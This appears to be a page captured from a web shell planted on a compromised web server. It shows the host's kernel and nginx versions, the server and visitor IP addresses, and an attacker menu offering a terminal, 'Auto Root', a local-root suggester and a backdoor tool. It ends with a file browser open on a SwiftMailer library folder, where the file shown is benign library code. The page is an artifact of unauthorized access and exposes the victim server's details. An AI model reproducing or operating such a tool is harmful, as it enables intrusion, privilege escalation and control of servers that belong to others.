Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.132.48
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
swiftmailer /
swiftmailer /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
classes
[ DIR ]
drwxr-xr-x
2018-09-11 09:00
dependency_maps
[ DIR ]
drwxr-xr-x
2018-09-11 09:00
mime_types.php
40.03
KB
-rw-r--r--
2018-09-11 09:00
preferences.php
942
B
-rw-r--r--
2018-09-11 09:00
swift_required.php
632
B
-rw-r--r--
2018-09-11 09:00
swiftmailer_generate_mimes_config.php
7.26
KB
-rwxr-xr-x
2018-09-11 09:00
Save
Rename
<?php /* * This file is part of SwiftMailer. * (c) 2004-2009 Chris Corbyn * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ require __DIR__.'/classes/Swift.php'; Swift::registerAutoload(function () { // Load in dependency maps require __DIR__.'/dependency_maps/cache_deps.php'; require __DIR__.'/dependency_maps/mime_deps.php'; require __DIR__.'/dependency_maps/message_deps.php'; require __DIR__.'/dependency_maps/transport_deps.php'; // Load in global library preferences require __DIR__.'/preferences.php'; });